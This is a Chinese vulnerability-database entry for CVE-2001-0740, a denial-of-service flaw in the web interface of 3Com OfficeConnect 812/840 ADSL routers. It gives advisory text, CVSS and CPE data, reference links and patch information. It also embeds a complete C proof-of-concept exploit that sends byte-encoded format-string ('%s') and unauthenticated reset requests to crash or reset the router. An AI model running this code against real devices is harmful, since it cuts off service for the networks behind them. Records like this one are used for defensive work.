CVE-2001-0740
CVSS5.0
发布时间 :2001-10-18 00:00:00
修订时间 :2016-10-17 22:11:55
NMCOE    

[原文]3COM OfficeConnect 812 and 840 ADSL Router 4.2, running OCR812 router software 1.1.9 and earlier, allows remote attackers to cause a denial of service via a long string containing a large number of "%s" strings, possibly triggering a format string vulnerability.


[CNNVD]3Com OfficeConnect Router Web管理接口远程拒绝服务攻击漏洞(CNNVD-200110-095)

        
        3Com OfficeConnect router是由3Com开发的一个路由器系列。
        3COM OfficeConnect 812和3Com OfficeConnect Remote 840 SDSL的Web管理接口存在远程拒绝服务问题。
        3COM OfficeConnect 812路由器的80端口运行的是HTTP服务器。用浏览器连上该端口后它会提示输入用户名和密码,在输入错误的用户名/密码之后会出现一个页面提示你这是一个受保护的对象。页面中有一个GIF图片,在该图片的URL的后面追加很多字符从而构造一个超长的URL并发送给路由器的80端口将使该路由器崩溃,在数分钟内又自动恢复正常。而且该路由器允许攻击者可以在不需要密码的情况下复位路由器。3Com OfficeConnect Remote 840 SDSL路由器也存在类似的缓冲区溢出,但无法自动恢复。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/h:3com:3c840-us:1.1.9
cpe:/h:3com:3cp4144:1.1.93Com OfficeConnect ADSL Router 812 1.1.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0740
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0740
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-095
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-05/0115.html
(VENDOR_ADVISORY)  BUGTRAQ  20010515 3COM OfficeConnect DSL router vulneratibilities
http://marc.info/?l=bugtraq&m=100119572524232&w=2
(UNKNOWN)  BUGTRAQ  20010921 3Com OfficeConnect 812/840 Router DoS exploit code
http://marc.info/?l=bugtraq&m=100137290421828&w=2
(UNKNOWN)  BUGTRAQ  20010924 Regarding: 3Com OfficeConnect 812/840 Router DoS exploit code
http://www.securityfocus.com/bid/2721
(VENDOR_ADVISORY)  BID  2721
http://xforce.iss.net/static/6573.php
(VENDOR_ADVISORY)  XF  3com-officeconnect-http-dos(6573)

- 漏洞信息

3Com OfficeConnect Router Web管理接口远程拒绝服务攻击漏洞
中危 未知
2001-10-18 00:00:00 2005-10-12 00:00:00
远程  
        
        3Com OfficeConnect router是由3Com开发的一个路由器系列。
        3COM OfficeConnect 812和3Com OfficeConnect Remote 840 SDSL的Web管理接口存在远程拒绝服务问题。
        3COM OfficeConnect 812路由器的80端口运行的是HTTP服务器。用浏览器连上该端口后它会提示输入用户名和密码,在输入错误的用户名/密码之后会出现一个页面提示你这是一个受保护的对象。页面中有一个GIF图片,在该图片的URL的后面追加很多字符从而构造一个超长的URL并发送给路由器的80端口将使该路由器崩溃,在数分钟内又自动恢复正常。而且该路由器允许攻击者可以在不需要密码的情况下复位路由器。3Com OfficeConnect Remote 840 SDSL路由器也存在类似的缓冲区溢出,但无法自动恢复。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 只允许受信任的网络访问路由器的23和80端口。
        厂商补丁:
        3Com
        ----
        目前厂商已经发布了升级补丁以修复这个安全问题:
        3com OfficeConnect DSL Router 812 1.1.7:
        3Com Upgrade OfficeConnect 812 & 840 1.1.9.4
        ftp://ftp.3com.com/pub/officeconnect/ocradsl/bld_1_1_9_4.zip
        3com OfficeConnect DSL Router 840 1.1.7:
        3Com Upgrade OfficeConnect 812 & 840 1.1.9.4
        ftp://ftp.3com.com/pub/officeconnect/ocradsl/bld_1_1_9_4.zip

- 漏洞信息 (20847)

3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 HTTP Port Router DoS (EDBID:20847)
hardware dos
2001-09-21 Verified
0 Sniffer
N/A [点击下载]
source: http://www.securityfocus.com/bid/2721/info

OfficeConnect 812 is a DSL router manufactured by 3Com, and distributed by numerous DSL providers. OfficeConnect 812 is an integrated ADSL router with an onboard 4 port switch.

A problem in the firmware included with this router could allow a Denial of Service. It is possible to reboot the router by connecting to the HTTP daemon, and requesting a long string. The router will power-cycle itself.

This problem makes it possible for a remote user to deny service to legimate users of networks serviced by the router. 

// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others)
// Proof of concept, soft and hard reset, the security is weak
// Written pour sniffer <sniffer@sniffer.net> 
// Fri Sep 21 15:51:35 BRT 2001
// Viva Brazil!

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>

void 
usage(binary)
char *binary;
{
fprintf(stderr,"3Com OfficeConnect 812 ADSL Router Denial of Service (%s)\nsniffer <sniffer@sniffer.net>\n\t%s <1 (soft) || 2 (hard)> <remote router>\n", __FILE__, binary);
}
int
main(argc, argv)
int argc;
char **argv;
{
int sockfd;
char senddata[1024];
char hardreset_data[] = { 
									 71,69,84,32,47,103,114,97,112,104,105,99,115,
                   47,115,109,108,51,99,111,109,37,115,37,115,37,
                   115,37,115,37,115,37,115,37,115,37,115,37,115,
                   37,115,37,115,37,115,37,115,37,115,37,115,37,
                   115,37,115,37,115,37,115,37,115,37,115,37,115,
                   37,115,37,115,37,115,37,115,37,115,37,115,37,
                   115,37,115,37,115,37,115,37,115,37,115,37,115,
                   37,115,37,115,37,115,37,115,37,115,37,115,37,
                   115,37,115,37,115,37,115,37,115,37,115,37,115,
                   37,115,37,115,37,115,37,115,37,115,37,115,37,
                   115,37,115,37,115,37,115,37,115,37,115,37,115,
                   37,115,37,115,37,115,37,115,32,72,84,84,80,
                   47,49,46,48,10,10,0 };
char softreset_data[] = {
                   80,79,83,84,32,47,70,111,114,109,115,47,97,
                   100,115,108,95,114,101,115,101,116,32,72,84,84,
                   80,47,49,46,49,10,72,111,115,116,58,32,49,
                   57,50,46,49,54,56,46,49,46,50,53,52,10,
                   67,111,110,110,101,99,116,105,111,110,58,32,99,
                   108,111,115,101,10,67,111,110,116,101,110,116,45,
                   76,101,110,103,116,104,58,32,49,57,10,10,83,
                   117,98,109,105,116,61,82,101,115,101,116,37,50,
                   48,76,105,110,101,10,10,0 };
struct hostent *he;
struct sockaddr_in their_addr;
								
if( argc != 3 )
{
	usage(argv[0]);
	exit(0);
}
if( atoi(argv[1]) >= 3 || atoi(argv[1]) == 0 )
{
	  usage(argv[0]);
		exit(0);	
}
if((he=gethostbyname(argv[2])) == NULL)
{
	herror("gethostbyname");
	exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(80);
their_addr.sin_addr = (*(struct in_addr *)he->h_addr);
bzero(&their_addr.sin_zero, 8);

if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) 
{
	perror("socket");
	exit(1);
}

if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) 
{
	perror("connect");
	exit(1);
}
else
{
	printf("connected\n");
}
if(atoi(argv[1]) == 1)
	strncpy(senddata, softreset_data, strlen(softreset_data));
else if(atoi(argv[1]) == 2)
	strncpy(senddata, hardreset_data, strlen(hardreset_data));

if(send(sockfd, senddata, sizeof(senddata), 0) == -1) 
{
	perror("send");
	exit(1);
}
else
{
	printf("evil data sent\n.. have a rice day\n");
}

close(sockfd);
return(0);				
}
		

- 漏洞信息

1827
3Com OfficeConnect ADSL Router HTTP Port Malformed URL Request Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-05-10 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.1.9.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站